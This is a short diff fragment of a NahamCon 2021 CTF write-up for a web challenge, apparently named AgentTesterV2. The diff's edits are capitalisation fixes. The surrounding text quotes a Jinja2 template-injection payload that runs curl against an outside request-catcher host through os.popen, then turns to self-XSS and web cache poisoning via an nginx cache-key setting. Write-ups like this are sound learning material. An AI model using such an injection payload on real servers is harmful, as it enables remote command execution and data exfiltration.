b4bergi/ctf-writeups/nahamcon-2021/AgentTesterV2.md

     first.send("code={{request.application.__globals__.__builtins__.__import__('os').popen('curl https://ghjkl.free.beeceptor.com').read()}}");
 ```

-After trying for some time and different variations of the payload i admitted to myself that this wasn't the correct route and took a break.
+After trying for some time and different variations of the payload I admitted to myself that this wasn't the correct route and took a break.
 I don't exactly know why it faild either flask or chromes same-site per default.

 # Self XSS + Web Cache Poisoning
-The next day i decided look at the **nginx.conf**.
+The next day I decided look at the **nginx.conf**.
 The thing that caught my attention almost immediatly was:
 ```proxy_cache_key $request_uri$http_user_agent;```